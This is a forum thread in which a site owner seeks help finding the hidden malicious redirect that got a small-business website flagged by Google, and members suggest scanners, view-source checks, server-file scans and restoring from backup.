News, tips, advice, support for Windows, Office, PCs & more. Tech help. No bull. We're community supported by donations from our Plus Members, and proud of it
Home icon Home icon Home icon Email icon RSS icon
  • how to detect hidden malicious links on website?

    Posted on Vincenzo Comment on the AskWoody Lounge

    Home Forums Developers, developers, developers Web design and development how to detect hidden malicious links on website?

    Viewing 21 reply threads
    • Author
      Posts
      • #2296614 Reply
        Vincenzo
        AskWoody Lounger

        Google is sending emails that our website has some links on it that are redirecting visitors, or directing them to malicious sites when clicked.
        Can anyone recommend software that will scan a site and list any outgoing links it finds?
        Thanks

      • #2296665 Reply
        Paul T
        AskWoody MVP

        Google is sending email on your behalf? From your website? Are you sure the email is from Google and not a scammer?

        What sort of links? Are they links on your site?

        cheers, Paul

      • #2296674 Reply
        Alex5723
        AskWoody Plus
      • #2296677 Reply
        doriel
        AskWoody Lounger

        What about VirusTotal?
        Personally I use that if Im not sure and I belive its a good tool.

        Dell Latitude E6530, Intel Core i5 @ 2.6 GHz, 4GB RAM, W10 1809 Enterprise

        HAL3000, AMD Athlon 200GE @ 3,4 GHz, 8GB RAM, Fedora 29

        • This reply was modified 1 month, 1 week ago by doriel. Reason: My grammar is so weak
      • #2296680 Reply
        OH_dutch
        AskWoody Lounger

        I have to agree that the question could be more clearly expressed, and others are posting links to try. My professional opinion for browsing someone else’s website:

        •  Modern web browsers will display a hyperlink’s resolution address, or URL, when the link is hovered over. If the link’s domain differs from the one in the text, odds are it’s trouble-in-River-City. When in doubt I will email the site webmaster to confirm its validity.

        And for received mail:

        •  Ensure that your personal network, and PCs, stay current on software patches in order to reduce known gotchas.
        •  Ensure that your PC(s) have firewalls turned on. The default Windows Defender is not fancy but certainly works to divert many attacks.
        •  Your browser is likely to divert suspected spam mail, including mail addressed in a bulk distribution list.
        •  Distrust all hyperlinks in any email until you have satisfied that they are legitimate. You may reach out to the sender and request confirmation. For example, a vendor’s disclaimer might mention their legitimate email will never ask the customer to reply with PII as “confirmation”.

        To drive home the lesson, my (large federal contractor) employer will periodically slip in official-looking mail that includes a benign bomb. Eventually I wised up and created an email rule to quarantine most all inbound mail. There is an exception clause that provides a whitelist of accepted domains. A smililar rule could catch all inbound mail having attachments.

        Good luck from a Dutch Uncle!

         

        1 user thanked author for this post.
        • #2296687 Reply
          doriel
          AskWoody Lounger

          Your desire

          software that will scan a site and list any outgoing links it finds

          requires specialized SW I think. You say

          Google is sending emails that our website has some links on it

          I suppose you use some CMS (Drupal, WP, ..). I would open the source code and count how many times “href” is found, Could this do the job? Did you put some of these links there? Are you aware, that you web is redirecting users?

          If the link’s domain differs from the one in the text, odds are it’s trouble-in-River-City. When in doubt I will email the site webmaster to confirm its validity.

          That is true. Unfortunatelly my experience is, that websites redirect regullary to display ads for you. If you are aware, that there are ads on the website, this method is not 100% valid. But if linked domain is suspicious, leave the webpage.

          Another tip: Install DuckDuckGo privacy essentials extension to your browser. On the top right corner of address field, there will small button, which immediatelly tells you security rating of the webpage and risks. Woody gets B+, which is not bad at all.

          ddgo

          Appendix:
          When opening attachments, its highly recommended to have displayed file extensions!
          Example: you will get picture in the email. you download it. In downloaded folder there is file

          PIC.jpeg

          but if you unhide extensions, you will see

          PIC.jpeg.exe

          And that is definatelly fraud dont click it.

          Dell Latitude E6530, Intel Core i5 @ 2.6 GHz, 4GB RAM, W10 1809 Enterprise

          HAL3000, AMD Athlon 200GE @ 3,4 GHz, 8GB RAM, Fedora 29

          • This reply was modified 1 month, 1 week ago by doriel.
          • This reply was modified 1 month, 1 week ago by doriel.
          Attachments:
          3 users thanked author for this post.
      • #2296695 Reply
        satrow
        AskWoody MVP

        First analyse and trace the email headers to ensure they’re genuine:
        https://support.google.com/mail/answer/29436?hl=en
        https://whatismyipaddress.com/email-header
        https://mxtoolbox.com/EmailHeaders.aspx

        Where/what are you hosting your website from, a remote host, local host, a computer at your home/work?

        2 users thanked author for this post.
      • #2296737 Reply
        Vincenzo
        AskWoody Lounger

        Thanks for the replies.
        Sorry, I could have given more details.

        The site is hosted on a shared server on Godaddy.

        The person doing SEO on the site has a Google Ad campaign in place. The ads have been running for a while with no problem.
        Last week Google sent her several emails saying they had suspended the campaign, here is the message:

        “Our latest scan from your site came back, and still detects Malware/links that are potentially harmful to you and to the site visitors. It seems that your site (landing page) redirects users to malicious links OR triggered when clicked.”

        Then they listed 3 links, supposedly on the homepage/landing page (we don’t have a specific landing page other than the homepage) to sites we’ve never heard of.

        So the Google emails are genuine, they are not the problem. Problem is the malicious links Google is detecting.

        I manually went through the site, did not see any obvious issues. I also scanned with Sucuri, the Google Transpareny Report, and Virustotal.

        I installed an extension on Chrome that lists all the outgoing links on page. That came up with no unexpected links on the homepage.

        I also checked the site with the Google Search Console, it showed no problems. But it is limited in what it detects.
        (Oddly, Google provides a link to this page https://support.google.com/webmasters/answer/3258249 which details how to get details from the Search Console on what malicious files they detected. But it shows “No Issues Detected”.
        (The emails from Google listing the problems do appear genuine).

        As far as actual experience on the site, it works fine on the computers I’ve tested it on, using 3 browsers on each. But on two iPhones, the redirect did happen to a 3rd party site. It happened once on my iPhone, once on another iPhone, and then not again. Yet.

        What I have not done yet is go through the files in the site looking for href instances that provide clues. I am hoping to find software that will make that task easier.

        Thanks

        • This reply was modified 1 month, 1 week ago by Vincenzo.
        • This reply was modified 1 month, 1 week ago by Vincenzo.
        • This reply was modified 1 month, 1 week ago by Vincenzo.
        • This reply was modified 1 month, 1 week ago by Vincenzo.
      • #2296749 Reply
        Vincenzo
        AskWoody Lounger

        One other thing. The SEO person recently started using GuildQuality, some sort of SEO service that provides valid testimonials. I am not familiar with it, but I asked her to remove all traces of it from the site. But the Google rescanned the site and is still blocking its ads.

      • #2296751 Reply
        Vincenzo
        AskWoody Lounger

        “Rip the site to your own PC and work through it locally: https://www.httrack.com/
        Thanks

        The problem i see doing that is that the site works fine for me online, I imagine it still would if I ripped it to my PC.
        I am depending on the Google Ad campaign scans to let me know where the problem is, at this point anyway. But getting details from them is difficult. when I make a change to site and ask them to rescan, it takes a few days before I get the result back.

        • This reply was modified 1 month, 1 week ago by Vincenzo.
      • #2296759 Reply
        Vincenzo
        AskWoody Lounger

        The site in question is ‘https:// www. get organized with bridges .com’.

        satrow edited: not redirecting to infect (no virus or other data-damaging code) but to an annoyance posing as a chance to win… whatever. The hosting server also serves adult-based ads. that look too good to be true, too (I’m just peeking into the code, right!). So, link broken, hope no-one got stuck there and that every winner receives their prize 🙂

        • This reply was modified 1 month, 1 week ago by satrow.
        • This reply was modified 1 month, 1 week ago by satrow.
        • This reply was modified 1 month, 1 week ago by satrow.
      • #2296763 Reply
        access-mdb
        AskWoody MVP

        Try checking with W3C linkchecker

        1 user thanked author for this post.
      • #2296781 Reply
        Vincenzo
        AskWoody Lounger

        Try checking with W3C linkchecker

        Thanks. Just tried it, nothing malicious or 3rd party comes up.

      • #2296954 Reply
        Paul T
        AskWoody MVP

        If you are getting occasional redirects it suggest either a malicious script or DNS hijack.

        A malicious script won’t be spotted by an external check, you need to scan the server side files.

        DNS hijack would be more likely to be a permanent change, not intermittent, but you should be able to rule that out by testing from different external sites / countries.

        I’ve just used the link to your site and was instantly redirected to “https://insectr unfollow8.li ve/?ut m_campa ign=QPF8 euu28II5lw7O 2iHhCidoSOX mw5oLx D6bwphw 43U1&t=mai n9”. (I’ve added spaces to the link to prevent it being used from Woodys.)
        This site is listed as malware/spam on VirusTotal.
        The redirect makes it look like a malicious script.

        Note: I run my browser with javascript turned off.

        cheers, Paul

        3 users thanked author for this post.
      • #2296969 Reply
        satrow
        AskWoody MVP

        You can safely check the source of pages and some other types by prefixing the URL with (don’t click, copy!) http://view-source:FullURL but I can’t see how to show it on this platform, using it in a link breaks it as it adds a further https:// prefix.

        • This reply was modified 1 month, 1 week ago by satrow.
        • This reply was modified 1 month, 1 week ago by satrow.
        • This reply was modified 1 month, 1 week ago by satrow.
        1 user thanked author for this post.
        • #2296978 Reply
          Alex5723
          AskWoody Plus

          In Chrome you can open More Tools – Developer tools.

          Attachments:
      • #2296984 Reply
        Alex5723
        AskWoody Plus

        On the redirected site, why?

        You can check for fishing, spam, privacy…. behavior.

        • #2296988 Reply
          satrow
          AskWoody MVP

          Already done, want a DM with the content from your long lost Russian relatives?

          How would that help the OP?

          Diagnosed already.

      • #2297128 Reply
        Vincenzo
        AskWoody Lounger

        I am somewhat surprised that you guys got re-directed since I have only seen it re-direct on the phone, and I’ve tried it from 3 browsers on 2 of my computers. I guess I should have disabled the link when I posted it, so it could not be accidentally clicked. Sorry.

        I am going to try some of the suggestions, also try it using a VPN to see if that makes it redirect. It’s hard to troubleshoot from my computer when I can’t make the issue appear.

         

      • #2297132 Reply
        Vincenzo
        AskWoody Lounger

        A malicious script won’t be spotted by an external check, you need to scan the server side files.

        How would I do that?

        Thanks

      • #2297134 Reply
        Vincenzo
        AskWoody Lounger

        Here’s something interesting. When I turn on the VPN in Norton and visit the site, I do get the re-directs. That’s the only time I’ve been able to see it myself on my computer. I see that the VPN made it appear like I am in North Carolina.

        Not sure what to make of that.

        I’ll try some of the above suggestions now.

        • This reply was modified 1 month, 1 week ago by Vincenzo.
        • #2297146 Reply
          satrow
          AskWoody MVP

          Check your DM messages, there’s one that attempts to give clearer links to looking at page sources as code – it should help a lot.

          I’ve read reports that the redirect triggers on the first view but not subsequent, I’ve seen the opposite! So, it might be random or based on some ‘order’, expect the unexpected but look at the source code where you can before going in with standard URLs.

      • #2297181 Reply
        Vincenzo
        AskWoody Lounger

        Check your DM messages, there’s one that attempts to give clearer links to looking at page sources as code – it should help a lot.

        Thanks, using your view-source: as a url prefix, I can finally see the redirect.

        Oddly it happens in Firefox but the site loads normally in Chrome.

        Any ideas on how to remove this redirect?

        Thanks

        • This reply was modified 1 month, 1 week ago by Vincenzo.
      • #2297182 Reply
        Vincenzo
        AskWoody Lounger

        All I can see when I use that technique is the redirect, but I can’t see where it is located on the page so I could remove it.

        And why would the page even load correctly as it does in Chrome when the source code only shows the redirect??

        • This reply was modified 1 month, 1 week ago by Vincenzo.
        • #2297188 Reply
          satrow
          AskWoody MVP

          Scripts, maybe browser UA, mouse action detection or something similar (do nothing unless…).

          The redirect is the page – provided you have fulfilled their criteria. If you haven’t, or you’re not vulnerable, you get the real page (maybe, I’ve not seen their script and probably wouldn’t understand it as it’s likely using min.js, or w/e compression is the latest ‘thing’.

          Wipe the site, fire your devs/staff/seo experts and claim comp. from them, check and tighten security obviously, reload the site from the original, or latest known-good copy, check security again…

          1 user thanked author for this post.
      • #2297460 Reply
        Paul T
        AskWoody MVP

        Agree with “fire your dev team and sue them”. There is no dev worthy of the name that would allow malicious scripts to be installed.

        You can get website apps that will scan your server pages for malicious scripts and check that you have valid packages installed, but this does require some knowledge on your part to install / maintain and it’s not free.

        If you have a backup of the site (if not, why not?) you can load it locally and scan the files using search in Windows Explorer for the site name, but it is probably encrypted / hidden to make it more difficult to detect.

        What you probably have is a single line that calls a javascript routine from a remote server. That allows the re-direct to be changed as required.

        cheers, Paul

        1 user thanked author for this post.
      • #2297497 Reply
        Vincenzo
        AskWoody Lounger

        Thanks for the input.

        There is no dev team. The site belongs to a friend of mine for her small business. I did install Updraft Plus backup previously, so there are current backups that can be restored. I am going to try the GoDaddy Security package first to see if that can detect it.

        Thanks

    Viewing 21 reply threads

    Please follow the -Lounge Rules- no personal attacks, no swearing, and politics/religion are relegated to the Rants forum.

    Reply To: how to detect hidden malicious links on website?

    You can use BBCodes to format your content.
    Your account can't use Advanced BBCodes, they will be stripped before saving.